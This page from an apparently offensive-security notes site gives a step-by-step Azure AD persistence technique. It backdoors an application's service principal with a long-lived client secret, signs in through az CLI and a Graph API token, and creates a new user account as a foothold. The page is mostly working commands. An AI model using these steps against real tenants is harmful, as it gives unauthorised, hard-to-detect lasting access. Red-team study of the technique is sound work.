🦦
Otter's Notes
  • Introduction
  • Articles
    • Dumping data from the Microsoft Recall folder
    • Gaining persistence on Windows with Time Providers
    • Reverse engineering LSASS to decrypt DPAPI keys
    • Intro to Hypervisor Implants
    • In-depth Windows Telemetry
  • Notes
    • Active Directory
      • Active Directory Structure
      • Active Directory Terminology
      • Active Directory Objects
      • Active Directory Groups
      • Active Directory Functionality
      • Active Directory Protocols
      • Active Directory Rights and Privileges
      • Security in Active Directory
      • Users and Machine Accounts
      • NTLM
      • LDAP
      • Making a Target User List
      • Enumerating & Retrieving Password Policies
      • Enumerating Security Controls
      • Examining Group Policy
      • GPOs
      • LAPS
      • LLMNR & NBT-NS Poisoning
      • LOLBIN Enumeration
    • AAD
      • Useful Links
      • Overview of Azure & M365
      • Enumerate Users and Domains
      • Post-exploitation Reconnaissance
      • OAuth 2.0 Abuse
      • Abusing Device Code Authentication
      • Abusing Cloud Administrator Role
      • Abusing User Administrator Role
      • AAD Federated Backdoor
      • Service Principal Abuse
      • Compromising Azure Blobs and Storage Accounts
      • Malicious Device Join
      • Disabling Auditing (Unified Audit Logs)
      • Spoofing Azure Sign-In Logs
      • Registering Fake Agents for Log Spoofing
      • Pass the PRT
      • Pass the Cookie
      • Abusing Managed Identities
      • Virtual Machine Abuse
      • Attacking Key Vaults
    • Forest Trust Abuse
      • Parent-Child Trust Abuse
      • One-Way Inbound Trust Abuse
      • Foreign Group Membership
      • Foreign ACL Principals
      • SID History
      • SID Filter Bypass
      • Intra-Forest Attacks
        • Configuration Naming Context Replication
        • ADCS NC Replication Attack
        • GPO On-Site Attack
        • GoldenGMSA Attack
        • DNS Trust Attack
      • Cross-Forest Attacks
        • Trust Account Attack
        • Abusing SQL Linked Servers
        • Abusing PAM Trusts
    • Kerberos
      • Overview of Kerberos Authentication
      • Silver Tickets
      • Golden Tickets
      • Diamond Tickets
      • Kerberoasting
      • AS-REPRoasting
      • Resource-Based Constrained Delegation
      • Constrained Delegation
      • Unconstrained Delegation
      • S4U2Self & S4U2Proxy
      • Golden Certificates
    • DACL Abuse
      • DACL Overview
      • DACLs Enumeration
      • AddMembers
      • GPO Attacks
      • Granting Rights and Ownership
      • Logon Scripts
      • NoPAC
      • Password Abuse
      • SPN Jacking
      • Shadow Credentials
      • Targeted Kerberoasting
    • ADCS
      • Introduction to ADCS
      • ESC1
      • ESC2
      • ESC3
      • ESC4
      • ESC5
      • ESC6
      • ESC7
      • ESC8
      • ESC9
      • ESC10
      • ESC11
      • Certificate Mapping
    • PowerShell
      • PowerShell Basics
      • PowerShell Remoting
      • Alternate PowerShell Hosts
      • PowerShell Pipeline Runners
      • PowerShell Code Signing
      • Scriptblock Logging
      • PowerShell CLM
      • AMSI
      • PowerShell Reflection
      • WMI - Windows Management Instrumentation
      • Interfacing with AD
      • PowerShell Snippets
        • Bypass application whitelisting and CLM with runscripthelper and WMI
        • Create fake PowerShell logs
        • Enumerate AD ACLs
        • Enumerate WMI events
        • Enumerate Domain Trusts
        • Enumerate change metadata
        • Enumerate non-signed service binaries
        • Enumerate with GPOs
        • Find signed alternate PowerShell hosts
        • Get AMSI module
        • Group processes by user with WMI
        • Hide processes from Get-Process
        • Malware re-purposing with PowerShell reflection
        • Monitor PowerShell hosts with WMI
        • PowerShell reflection offensive use-case
        • Query PowerShell alternative hosts with WMI
        • Retrieve file certificate
        • Search LDAP for misconfigurations
        • Sign custom code with PowerShell
        • WMI service creation
        • Weak folder permission enumeration
    • AWS
      • AWS Organizations
      • AWS Principals
    • Binary Exploitation
      • Environment setup for Browser Exploitation
      • Browser Overview and Components
    • Kernel Development
      • Windows
        • Configuring a VM for driver development
Powered by GitBook
On this page
  1. Notes
  2. AAD

Service Principal Abuse

PreviousAAD Federated BackdoorNextCompromising Azure Blobs and Storage Accounts

Last updated 7 months ago

This persistence method consists in backdooring Azure applications leveraging the permissions of a SP account to gain SSO access to the environment with the permissions of that applications without the need for credentials.

The main benefits of attacking SP accounts is that these accounts can't have MFA enforced on login and they are created by default along with any application, the only downside is the possible presence of a Conditional Access Policy that enforces other conditions on the login process but it still isn't enough to set MFA on a Service Principal account.

Once we created an application (or we took control of an existing one) we want to add a Client Secret with a pretty generous expiration period; this secret is the password we'll be able to use to log into the application. As we already did in we can now log into the application as a Service Principal

PS /home/otter> az login --service-prinipal -u <application_id> -p <client_secret> --tenant <tenant_id>

Another method we can use to log into the SP account is using Graph API

PS /home/otter> $AppId = "<app_id>"
PS /home/otter> $TenantId = "<tenant_id>"
PS /home/otter> $ClientSecret = "<client_secret>"
PS /home/otter> $body = @{
>> Grant_Type = "client_credentials"
>> Scope = "https://graph.microsoft.com/.default"
>> Client_Id = $AppId
>> Client_Secret = $ClientSecret
>> }
PS /home/otter> $connection = Invoke-RestMethod `
>> -Uri https://login.microsoftonline.com/$TenantId/oauth2/v2.0/token `
>> -Method POST `
>> -Body $body
PS /home/otter> $token = $connection.access_token
PS /home/otter> Connect-MgGraph -AccessToken $token

Since the SP account has the same permissions as its application we need to pick an application with "interesting" permissions over the tenant; ideally we'd want to create a new user account as a persistence mechanism, to do so we need the new-MgUser permissions so can use the following commands to list all the permissions required to perform that action.

PS /home/otter> (Find-MgGraphCommand -command new-MgUser).permissions
# list permissions we have
PS /home/otter> Get-MgContext | Select -ExpandProperty Scopes

If the application already has these permissions or we can delegate them to the app itself we are able to create a new user account.

PS /home/otter> New-MgUser -DisplayName "Otter Sec" -PasswordProfile $PasswordProfile -AccountDisabled -MailNickName "otter" -UserPrincipalName "ottersec@minions.onmicrosoft.com"

The final step is to log in as this user and change their password.

Abusing Cloud Administrator Role